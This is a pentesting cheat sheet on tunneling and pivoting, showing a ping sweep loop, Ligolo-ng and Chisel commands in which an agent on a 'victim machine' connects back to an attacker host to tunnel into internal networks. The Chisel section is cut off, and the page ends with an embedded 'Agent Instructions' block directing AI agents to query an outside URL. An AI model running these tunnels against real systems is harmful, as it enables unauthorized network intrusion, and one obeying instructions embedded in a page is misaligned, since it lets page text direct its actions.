# Tunneling and Pivoting ## For Loop Command ``` for i in {1..255};do ping -c 1 192.168.110.$i > /dev/null;if [ $? -eq 0 ];then echo 192.168.110.$i;fi;done ``` ## Ligolo-ng Ligolo makes a tunnel just like a VPN; there is no need to use proxychains 1. Download Agent and Proxy from Ligolo Github Page 2. Agent will Run on Victim Machine and Proxy Will run on Attacker Machine (Kali-Linux) Before Running agents and Proxy you need to run 2 commands on your kali linux ```python # These commands will set the ligolo interface on your kali linux sudo ip tuntap add user root mode tun ligolo sudo ip link set ligolo up ``` Then We need to run the Proxy ```python ligolo-linux-proxy -selfcert -laddr 0.0.0.0:443 ```

after that upload the Agent on the Targer machine and run the below command ```python ./lin-agent -connect 10.8.5.85:11601 -ignore-cert ```

After that, you need to add the route ```python sudo ip route add 172.18.0.0/24 dev ligolo ``` then ``` start ```

## Chisel We can use chisel as well for tunneling, ```python chisel server -p 1234 --reverse # Run on kali linux (Attacker Machine) ```

```python ./chisel-linux client 10.8.5.85:1234 R:socks # Run on Victim Machine ```

for this to work your /etc/proxychains4.conf file should have following entry

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.programmersecurity.com/windows-privilege-escalation/tunneling-and-pivoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.